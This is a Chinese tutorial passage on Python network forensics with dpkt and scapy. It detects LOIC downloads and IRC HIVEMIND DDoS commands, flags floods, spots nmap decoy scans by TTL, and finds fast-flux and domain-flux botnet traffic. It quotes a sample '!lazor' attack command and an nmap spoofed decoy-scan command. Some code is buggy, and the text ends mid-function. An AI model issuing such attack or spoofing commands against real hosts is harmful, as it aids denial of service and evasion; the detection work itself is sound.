<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"geotest.pcap"</span><span class="p">)</span>
    <span class="n">pcap</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">pcap</span><span class="p">.</span><span class="n">Reader</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
    <span class="n">print_pcap</span><span class="p">(</span><span class="n">pcap</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="使用-python-画谷歌地图">使用 Python 画谷歌地图</h3>

<p>谷歌地图能在一个专门的界面中显示出一个虚拟地球仪、地图和地理信息。虽然用的是专用的界面，但谷歌地图可以让你很方便地在地球仪上画出指定位置或轨迹。通过创建一个扩展名为 KML 的文本文件，用户可以把许多个地理位置标在谷歌地球上。KML 是有特定规定的 XML 结构。</p>

<p>写一个函数 <code class="language-plaintext highlighter-rouge">ret_KML</code> 接收一个 IP，并返回表示该 IP 地址对应物理地址的 KML 结构</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">ret_kml</span><span class="p">(</span><span class="n">ip</span><span class="p">):</span>
    <span class="n">rec</span> <span class="o">=</span> <span class="n">gi</span><span class="p">.</span><span class="n">record_by_name</span><span class="p">(</span><span class="n">ip</span><span class="p">)</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">longitude</span> <span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"longitude"</span><span class="p">]</span>
        <span class="n">latitude</span><span class="o">=</span> <span class="n">rec</span><span class="p">[</span><span class="s">"latitude"</span><span class="p">]</span>
        <span class="n">kml</span> <span class="o">=</span> <span class="p">(</span>
        	<span class="s">"&lt;Placemark&gt;</span><span class="se">\n</span><span class="s">"</span>
            <span class="s">"&lt;name&gt;%s&lt;/name&gt;</span><span class="se">\n</span><span class="s">"</span>
            <span class="s">"&lt;Point&gt;</span><span class="se">\n</span><span class="s">"</span>
            <span class="s">"&lt;coordinates&gt;%6f,%6f&lt;/coordinates&gt;</span><span class="se">\n</span><span class="s">"</span>
            <span class="s">"&lt;/Point&gt;</span><span class="se">\n</span><span class="s">"</span>
            <span class="s">"&lt;/Placemark&gt;</span><span class="se">\n</span><span class="s">"</span>
        <span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="n">ip</span><span class="p">,</span> <span class="n">longitude</span><span class="p">,</span> <span class="n">latitude</span><span class="p">)</span>
        <span class="k">return</span> <span class="n">kml</span>
	<span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">return</span> <span class="s">""</span>
</code></pre></div></div>

<p>可能想要使用不同的图标来表示不同类型的网络流量，比如可以用源和目标 TCP 端口来区分不同的网络流量。可以查看谷歌 KML 文档。</p>

<h2 id="匿名者-真能匿名吗分析-loic-流量">“匿名者” 真能匿名吗？分析 LOIC 流量</h2>

<p>LOIC（Low Orbit Ion Cannon，低轨道离子炮）是一个分布式拒绝服务工具包。</p>

<p>LOIC 使用大量的 UDP 和 TCP 流量对目标进行拒绝服务式攻击。</p>

<p>LOIC 提供两种操作模式。在第一种模式下，用户可以输入目标的地址。在第二种被称为 HIVEMIND（蜂群）的模式下，用户将 LOIC 连接到一台 IRC 服务器上，在这台服务器上，用户可以提出攻击，连接在这台服务器上的 IRC 的用户就会自动对该目标进行攻击</p>

<h3 id="使用-dkpt-发现下载-loic-的行为">使用 Dkpt 发现下载 LOIC 的行为</h3>

<p>编写一个 Python 脚本来解析 HTTP 流量，并检查其中有无通过 HTTP GET 获取压缩过的 LOIC 二进制可执行文件的情况。要做到这一点，需要再次使用 Dug Song 的 Dpkt 库。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">dpkt</span>
<span class="kn">import</span> <span class="nn">socket</span>

<span class="k">def</span> <span class="nf">find_download</span><span class="p">(</span><span class="n">pcap</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">ts</span><span class="p">,</span> <span class="n">buf</span> <span class="ow">in</span> <span class="n">pcap</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">eth</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">ethernet</span><span class="p">.</span><span class="n">Ethernet</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
            <span class="n">ip</span> <span class="o">=</span> <span class="n">eth</span><span class="p">.</span><span class="n">data</span>
            <span class="n">src</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">src</span><span class="p">)</span>
            <span class="n">tcp</span> <span class="o">=</span> <span class="n">ip</span><span class="p">.</span><span class="n">data</span>
            <span class="n">http</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">http</span><span class="p">.</span><span class="n">Request</span><span class="p">(</span><span class="n">tcp</span><span class="p">.</span><span class="n">data</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">http</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="s">"GET"</span><span class="p">:</span>
                <span class="n">uri</span> <span class="o">=</span> <span class="n">http</span><span class="p">.</span><span class="n">uri</span><span class="p">.</span><span class="n">lower</span><span class="p">()</span>
                <span class="k">if</span> <span class="s">".zip"</span> <span class="ow">in</span> <span class="n">uri</span> <span class="ow">and</span> <span class="s">"loic"</span> <span class="ow">in</span> <span class="n">uri</span><span class="p">:</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[!] {} Download LOIC."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">))</span>
       <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>
<span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">()</span>
<span class="n">pcap</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">pcap</span><span class="p">.</span><span class="n">Reader</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="n">find_download</span><span class="p">(</span><span class="n">pcap</span><span class="p">)</span>
</code></pre></div></div>

<h3 id="解析-hive-服务器上的-irc-命令">解析 Hive 服务器上的 IRC 命令</h3>

<p>“匿名者” 成员需要登录到指定的 IRC 服务器上发出一条攻击指令，如 <code class="language-plaintext highlighter-rouge">!lazor targetip=66.211.169.66 message=test_test port=80 method=tcp wait=false random=true start</code>。任何把 LOIC 以 HIVEMIND 模式连上 IRC 服务器的“匿名者”成员都能立即开始攻击该目标。</p>

<p>在大多数情况下，IRC 服务器使用的是 TCP 6667 端口。发往 IRC 服务器的消息的目标 TCP 端口应该就是 6667。从 IRC 服务器那里发出消息的 TCP 源端口也应该是 6667。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">dpkt</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="k">def</span> <span class="nf">find_hivemind</span><span class="p">(</span><span class="n">pcap</span><span class="p">):</span>
    <span class="k">for</span> <span class="n">ts</span><span class="p">,</span> <span class="n">buf</span> <span class="ow">in</span> <span class="n">pcap</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">eth</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">ethernet</span><span class="p">.</span><span class="n">Ethernet</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
            <span class="n">ip</span> <span class="o">=</span> <span class="n">eth</span><span class="p">.</span><span class="n">data</span>
            <span class="n">src</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">src</span><span class="p">)</span>
            <span class="n">dst</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">dst</span><span class="p">)</span>
            <span class="n">tcp</span> <span class="o">=</span> <span class="n">ip</span><span class="p">.</span><span class="n">data</span>
            <span class="n">dport</span> <span class="o">=</span> <span class="n">tcp</span><span class="p">.</span><span class="n">dport</span>
            <span class="n">sport</span> <span class="o">=</span> <span class="n">tcp</span><span class="p">.</span><span class="n">sport</span>
            <span class="k">if</span> <span class="n">dport</span> <span class="o">==</span> <span class="mi">6667</span><span class="p">:</span>
                <span class="k">if</span> <span class="s">"!lazor"</span> <span class="ow">in</span> <span class="n">tcp</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">lower</span><span class="p">():</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[!] DDoS Hivemind issued by: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">))</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Target CMD: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">tcp</span><span class="p">.</span><span class="n">data</span><span class="p">))</span>
            <span class="k">if</span> <span class="n">sport</span> <span class="o">==</span> <span class="mi">6667</span><span class="p">:</span>
                <span class="k">if</span> <span class="s">"!lazor"</span> <span class="ow">in</span> <span class="n">tcp</span><span class="p">.</span><span class="n">data</span><span class="p">.</span><span class="n">lower</span><span class="p">():</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[!] DDoS Hivemind issued to: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">))</span>
                    <span class="k">print</span><span class="p">(</span><span class="s">"[+] Target CMD: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">tcp</span><span class="p">.</span><span class="n">data</span><span class="p">))</span>
		<span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>
</code></pre></div></div>

<h3 id="实时监测-ddos-攻击">实时监测 DDoS 攻击</h3>

<p>若要识别攻击，需要设置一个不正常的数据包数量的阈值。如果某一用户发送某个地址的数据包的数量超过了这个阈值，就表明发生了我们需要把它视为攻击做进一步调查的事情。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">dpkt</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="n">THRESH</span> <span class="o">=</span> <span class="mi">10000</span>
<span class="k">def</span> <span class="nf">find_attack</span><span class="p">(</span><span class="n">pcap</span><span class="p">):</span>
    <span class="n">pkt_count</span> <span class="o">=</span> <span class="p">{}</span>
    <span class="k">for</span> <span class="n">ts</span><span class="p">,</span> <span class="n">buf</span> <span class="ow">in</span> <span class="n">pcap</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">eth</span> <span class="o">=</span> <span class="n">dpkt</span><span class="p">.</span><span class="n">ethernet</span><span class="p">.</span><span class="n">Ethernet</span><span class="p">(</span><span class="n">buf</span><span class="p">)</span>
            <span class="n">ip</span> <span class="o">=</span> <span class="n">eth</span><span class="p">.</span><span class="n">data</span>
            <span class="n">src</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">src</span><span class="p">)</span>
            <span class="n">dst</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">ip</span><span class="p">.</span><span class="n">dst</span><span class="p">)</span>
            <span class="n">tcp</span> <span class="o">=</span> <span class="n">ip</span><span class="p">.</span><span class="n">data</span>
            <span class="n">dport</span> <span class="o">=</span> <span class="n">tcp</span><span class="p">.</span><span class="n">dport</span>
            <span class="k">if</span> <span class="n">dport</span> <span class="o">==</span> <span class="mi">80</span><span class="p">:</span>
                <span class="n">stream</span> <span class="o">=</span> <span class="s">"{}:{}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">)</span>
            	<span class="k">if</span> <span class="n">pkt_count</span><span class="p">.</span><span class="n">has_key</span><span class="p">(</span><span class="n">stream</span><span class="p">):</span>
                    <span class="n">pkt_count</span><span class="p">[</span><span class="n">stream</span><span class="p">]</span> <span class="o">=</span> <span class="n">pkt_count</span><span class="p">[</span><span class="n">stream</span><span class="p">]</span> <span class="o">+</span> <span class="mi">1</span>
                <span class="k">else</span><span class="p">:</span>
                    <span class="n">pkt_count</span><span class="p">[</span><span class="n">stream</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span>
		<span class="k">except</span><span class="p">:</span>
            <span class="k">pass</span>
        
<span class="k">for</span> <span class="n">stream</span> <span class="ow">in</span> <span class="n">pkt_count</span><span class="p">:</span>
    <span class="n">pkts_sent</span> <span class="o">=</span> <span class="n">pkt_count</span><span class="p">[</span><span class="n">stream</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">pkt_sent</span> <span class="o">&gt;</span> <span class="n">THRESH</span><span class="p">:</span>
        <span class="n">src</span> <span class="o">=</span> <span class="n">stream</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">":"</span><span class="p">)[</span><span class="mi">0</span><span class="p">]</span>
        <span class="n">dst</span> <span class="o">=</span> <span class="n">stream</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">":"</span><span class="p">)[</span><span class="mi">1</span><span class="p">]</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] {} attacked {} with {} pkts."</span><span class="nb">format</span><span class="p">(</span><span class="n">src</span><span class="p">,</span> <span class="n">dst</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">pkts_sent</span><span class="p">)))</span>
</code></pre></div></div>

<h2 id="hdmoore-是如何解决五角大楼的麻烦的">H.D.Moore 是如何解决五角大楼的麻烦的</h2>

<p>一系列协调一致的老练的攻击：<code class="language-plaintext highlighter-rouge">CIO Institude bulletin on computer security, 1999</code></p>

<p>检测出 Nmap 扫描十分容易，而且还可以查出攻击者的 IP 地址，并依次找出该 IP 的物理地址。但是，攻击者可以使用 nmap 的高级选项。他们扫描时在数据包中不必填入自己的地址，可以填入地球上其他许多不同地方的 IP 地址进行伪装扫描（decoy scan）</p>

<p>Moore 建议使用 TTL 字段分析所有来自 Nmap 扫描的数据包。IP 数据包的 TTL（time-to-live）字段可以用来确定在到达目的地之前数据包经过了几跳。每当一个数据包经过一个路由设备时，路由器会将 TTL 字段中的值减去一。Moore 意识到这是个确定扫描源的好方法。对每个被记录为 Nmap 扫描包的源地址来说，他都会发送一个 ICMP 数据包，去确定源地址和被扫描的机器之间隔了几跳。然后他就运用这些信息来辨认真正的扫描员。显然，只有来自真实的扫描源的包中的 TTL 正确的，伪造 IP 的包中的 TTL 值则应该是不正确的。Moore 将他的工具命名为 Nlog，因为它能记录 Nmap 扫描包中的许多信息。</p>

<h3 id="理解-ttl-字段">理解 TTL 字段</h3>

<p>IP 数据包的 TTL 字段。TTL 字段由 8 比特组成，可以有效记录 0 到 255 之间的值。当计算机发送一个 IP 数据包时，它将 TTL 字段设置为数据包在到达目的地址前所应经过的中继跳的上限值。数据包每经过一个路由设备，TTL 值就自减一。如果 TTL 值到了零，路由器就会丢弃该数据包，以防止无限路由循环。</p>

<p>当在 Nmap 1.6 中引入伪装扫描时，伪造数据包的 TTL 值既不是随机的，也不是经过精心计算的。正因为 TTL 值没有经过正确计算，Moore 才能够识别这些数据包。Nmap 运用以下算法随机化 TTL。该算法为平均约 48 个数据包生成一个随机的 TTL 值。用户也可以通过一个可选的参数把 TTL 设为一个固定值。</p>

<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// 生存时间</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ttl</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">){</span>
  <span class="n">my_ttl</span> <span class="o">=</span> <span class="p">(</span><span class="n">get_random_uint</span><span class="p">()</span> <span class="o">%</span> <span class="mi">23</span><span class="p">)</span> <span class="o">+</span> <span class="mi">37</span><span class="p">;</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
  <span class="n">my_ttl</span> <span class="o">=</span> <span class="n">ttl</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>在以伪装扫描模式运行 Nmap 时，使用 -D 参数后跟一个 IP 地址。此外，还可以用 <code class="language-plaintext highlighter-rouge">-ttl</code> 参数把 TTL 值固定为 13。</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap 192.168.1.7 <span class="nt">-D</span> 8.8.8.8 <span class="nt">-ttl</span> 13
</code></pre></div></div>

<p>在目标主机 192.168.1.7 上，用 verbose 模式（-v）运行 tcpdump，禁用名称解析（-nn），并只显示与地址 <code class="language-plaintext highlighter-rouge">8.8.8.8</code> 相关的流量（<code class="language-plaintext highlighter-rouge">host 8.8.8.8</code>）。可以看到 nmap 成功地用假地址 <code class="language-plaintext highlighter-rouge">8.8.8.8</code> 发送了 TTL 值为 13 的伪造数据包。</p>

<h3 id="用-scapy-解析-ttl-字段的值">用 scapy 解析 TTL 字段的值</h3>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">def</span> <span class="nf">test_ttl</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">IP</span><span class="p">):</span>
            <span class="n">ipsrc</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">IP</span><span class="p">).</span><span class="n">src</span>
            <span class="n">ttl</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">pkt</span><span class="p">.</span><span class="n">ttl</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Pkt Received From: {} with TTL: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">ipsrc</span><span class="p">,</span> <span class="n">ttl</span><span class="p">))</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>
    
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">sniff</span><span class="p">(</span><span class="n">prn</span><span class="o">=</span><span class="n">test_ttl</span><span class="p">,</span> <span class="n">store</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
</code></pre></div></div>

<p>Linux/Unix 系统通常把 TTL 的初始值设为 64，而 Windows 系统则把它设为 128。</p>

<p>需要把内网/私有 IP 地址（<code class="language-plaintext highlighter-rouge">10.0.0.0~10.255.255.255</code>、<code class="language-plaintext highlighter-rouge">172.16.0.0~172.31.255.255</code>，以及 <code class="language-plaintext highlighter-rouge">192.168.0.0</code> ~ <code class="language-plaintext highlighter-rouge">192.168.255.255</code>）的数据包全部去掉。要做到这一点，需要导入 IPy 库。为了避免 IPy 库中的 IP 类与 Scapy 库中的 IP 类冲突，把它重命名为 IPTEST 类。如果 <code class="language-plaintext highlighter-rouge">IPTEST(ipsrc).iptype()</code> 返回 <code class="language-plaintext highlighter-rouge">PRIVATE</code>，就忽略对该数据包的检查。</p>

<p>可能会收到来自同一个源地址的多个数据包，而我们又不想重复检查同一个源地址。如果之前从未见过这个源地址，则要构建一个目标 IP 地址为这个源地址的 IP 包，这个包应该是一个 ICMP 请求报，这样目标主机就会做出回应。一旦目标主机做出了响应，我们就把 TTL 值存储在一个用源 IP 地址作为索引的词典中。然后将实际收到的 TTL 与原始数据包中的 TTL 放在一起，判断它们的差值是否超过了一个阈值。走不同的路径到达目标主机的数据包所经过的路由设备的数量可能会有所差异，因此其 TTL 也可能不完全一样。但是，如果中继跳数的差超过了 5 跳，则可以推断该 TTL 是假的。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">from</span> <span class="nn">IPy</span> <span class="kn">import</span> <span class="n">IP</span> <span class="k">as</span> <span class="n">IPTEST</span>
<span class="n">ttl_values</span> <span class="o">=</span> <span class="p">{}</span>
<span class="n">THRESH</span> <span class="o">=</span> <span class="mi">5</span>

<span class="k">def</span> <span class="nf">check_ttl</span><span class="p">(</span><span class="n">ipsrc</span><span class="p">,</span> <span class="n">ttl</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">IPTEST</span><span class="p">(</span><span class="n">ipsrc</span><span class="p">).</span><span class="n">iptype</span><span class="p">()</span> <span class="o">==</span> <span class="s">"PRIVATE"</span><span class="p">:</span>
        <span class="k">return</span>
    <span class="k">if</span> <span class="ow">not</span> <span class="n">ttl_values</span><span class="p">.</span><span class="n">has_key</span><span class="p">(</span><span class="n">ipsrc</span><span class="p">):</span>
        <span class="n">pkt</span> <span class="o">=</span> <span class="n">sr1</span><span class="p">(</span><span class="n">IP</span><span class="p">(</span><span class="n">dst</span><span class="o">=</span><span class="n">ipsrc</span><span class="p">)</span> <span class="o">/</span> <span class="n">ICMP</span><span class="p">(),</span> <span class="n">retry</span><span class="o">=</span><span class="mi">0</span><span class="p">,</span> <span class="n">timeout</span> <span class="o">=</span> <span class="mi">1</span><span class="p">,</span> <span class="n">verbose</span><span class="o">=</span><span class="mi">0</span><span class="p">)</span>
        <span class="n">ttl_values</span><span class="p">[</span><span class="n">ipsrc</span><span class="p">]</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">ttl</span>
	<span class="k">if</span> <span class="nb">abs</span><span class="p">(</span><span class="nb">int</span><span class="p">(</span><span class="n">ttl</span><span class="p">)</span> <span class="o">-</span> <span class="nb">int</span><span class="p">(</span><span class="n">ttl_values</span><span class="p">[</span><span class="n">ipsrc</span><span class="p">]))</span> <span class="o">&gt;</span> <span class="n">THRESH</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[!] Detected Possible Spoofed Packet From: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">ipsrc</span><span class="p">))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[!] TTL: {}, Actual TTL: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">ttl</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="n">ttl_values</span><span class="p">[</span><span class="n">ipsrc</span><span class="p">])))</span>
</code></pre></div></div>

<p>尽管 RFC 1700 中建议把默认的 TTL 值设为 64，但是自 MS Windows NT 4.0 起，微软 Windows 就已经把 TTL 的初始值设为 128 了。此外，其他一些类 UNIX 系统也会使用不同的 TTL 初始值，比如 Solaris 2.x 的默认 TTL 初始值就是 255。</p>

<h2 id="风暴storm-的-fast-flux-和-conficker-的-domain-flux">“风暴”（Storm） 的 fast-flux 和 Conficker 的 domain-flux</h2>

<p>名为 <code class="language-plaintext highlighter-rouge">fast-flux</code> 的技术使用域名服务（DNS）记录隐藏指挥风暴僵尸网络的控制与命令信道。DNS 记录一般是用来将域名转换为 IP 地址的。当 DNS 服务器返回一个结果时，它会同时指定一个 TTL——告诉主机这个 IP 地址在多长的时间里肯定是有效的，因此在这段时间里无须再次解析该域名。</p>

<p>风暴僵尸网络背后的攻击者会非常频繁地改变用于指挥与控制服务器的 DNS 记录。事实上，他们使用了分布在 50 多个国家的 384 个网络供应商手上的 2000 台冗余服务器。攻击者频繁地且切换指挥与控制服务器的 IP 地址，并在 DNS 查询结果中返回一个很短的 TTL。这种快速变化 IP 地址的做法（fast-flux）使得别人很难找出僵尸网络的指挥与控制服务器。</p>

<p>Conficker 是迄今为止最成功的电脑蠕虫病毒，通过 Windows 服务消息块（Windows Service Message Block，SMB）协议中的一个漏洞传播。一旦被感染，有漏洞的机器便联络命令与控制服务器，以获得进一步的指令。然而，Conficker 每三个小时会使用 UTC 格式的当前日期和时间生成一批不同的域名。对 Conficker 的第三个版本来说，这意味着每三个小时生成 50000 个域名。攻击者只注册了这些域名中的很少一部分，让它们能映射成真正的 IP 地址。这使得拦截和阻止来自命令与控制服务器的流量变得十分困难。由于该技术是轮流使用域名的，所以研究人员便将其命名为 <code class="language-plaintext highlighter-rouge">domain-flux</code></p>

<h3 id="你的-dns-知道一些不为你所知的吗">你的 DNS 知道一些不为你所知的吗？</h3>

<p>用 tcpdump 检查 DNS 查询过程可以看到，客户端向 DNS 服务器发送了一次请求。具体地说，客户端生成了一个 <code class="language-plaintext highlighter-rouge">DNS Question Record（DNSQR）</code>，查询对应域名的 IPv4 地址。服务器响应了一个 <code class="language-plaintext highlighter-rouge">DNS Resource Record（DNSRR）</code>，给出了域名的 IP 地址。</p>

<h3 id="使用-scapy-解析-dns-流量">使用 Scapy 解析 DNS 流量</h3>

<p>在用 Scapy 检查这些 DNS 协议请求包时，要检查的字段在 DNSQR 和 DNSRR 包都存在。一个 DNSQR 包中含有查询的名称（qname）、查询的类型（qtype）和查询的类别（qclass）。服务器相应的一个对应的 DNSRR，其中含有资源记录名名称（rrname）、类型（type）、资源记录类别（rclass）和 TTL。</p>

<p>欧洲网络和信息安全机构（The European Network and Information Security Agency）提供了一个分析网络流量的极好资源，该机构提供一个可启动的 DVD ISO 镜像，其中还含有几个网络抓包文件和练习。其中练习 7 中演示了 <code class="language-plaintext highlighter-rouge">fast-flux</code> 行为的 pcap 包。</p>

<h3 id="用-scapy-找出-fast-flux-流量">用 Scapy 找出 <code class="language-plaintext highlighter-rouge">fast-flux</code> 流量</h3>

<p>写一个 Python 脚本，从 pcap 文件中读取数据，并把所有含 DNSRR 的数据包解析出来</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>
<span class="n">dns_records</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span>

<span class="k">def</span> <span class="nf">handle_pkt</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">DNSRR</span><span class="p">):</span>
        <span class="n">rrname</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">DNSRR</span><span class="p">).</span><span class="n">rrname</span>
        <span class="n">rdata</span> <span class="o">=</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">DNSRR</span><span class="p">).</span><span class="n">rdata</span>
        <span class="k">if</span> <span class="n">dns_records</span><span class="p">.</span><span class="n">has_key</span><span class="p">(</span><span class="n">rrname</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">rdata</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">dns_records</span><span class="p">[</span><span class="n">rrname</span><span class="p">]:</span>
                <span class="n">dns_records</span><span class="p">[</span><span class="n">rrname</span><span class="p">].</span><span class="n">append</span><span class="p">(</span><span class="n">rdata</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="n">dns_records</span><span class="p">[</span><span class="n">rrname</span><span class="p">]</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
            <span class="n">dns_records</span><span class="p">[</span><span class="n">rrname</span><span class="p">].</span><span class="n">append</span><span class="p">(</span><span class="n">rdata</span><span class="p">)</span>
            
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
    <span class="n">pkts</span> <span class="o">=</span> <span class="n">rdpcap</span><span class="p">(</span><span class="s">"fast_flux.pcap"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">pkt</span> <span class="ow">in</span> <span class="n">pkts</span><span class="p">:</span>
        <span class="n">handle_pkt</span><span class="p">(</span><span class="n">pkt</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">item</span> <span class="ow">in</span> <span class="n">dns_records</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] {} has {} unique IPs."</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">item</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">dns_records</span><span class="p">[</span><span class="n">item</span><span class="p">])))</span>
</code></pre></div></div>

<h3 id="用-scapy-找出-domain-flux-流量">用 Scapy 找出 Domain Flux 流量</h3>

<p>Conficker 使用的是 <code class="language-plaintext highlighter-rouge">domain-flux</code> 技术，我们需要寻找的就是那些对未知域名查询回复出错消息的服务器响应包。DNS 服务器是没法把大多数域名转换为真正的 IP 地址的，对这些域名，服务器回复一个出错了的消息。可以通过找出所有含域名出错的错误代码的 DNS 响应包的方式，实时地识别出 <code class="language-plaintext highlighter-rouge">domain-flux</code></p>

<p>再次读取网络抓包文件，并逐一检查抓包文件中的各个数据包。只检查来自服务器 53 端口的数据包——这种包中含有资源记录。DNS 数据包中有一个 rcode 字段。当 rcode 等于 3 时，表示的是域名不存在。然后把域名打印在屏幕上，并更新所有未得到应答的域名请求的计数器。</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">scapy.all</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">def</span> <span class="nf">dns_qrtest</span><span class="p">(</span><span class="n">pkt</span><span class="p">):</span>
    <span class="k">if</span> <span class="n">pkt</span><span class="p">.</span><span class="n">haslayer</span><span class="p">(</span><span class="n">DNSRR</span><span class="p">)</span> <span class="ow">and</span> <span class="n">pkt</span><span class="p">.</span><span class="n">getlayer</span><span class="p">(</span><span class="n">UDP</span><span class="p">).</span><span class="n">sport</span> <span class="o">==</span> <span class="mi">53</span><span class="p">:</span>
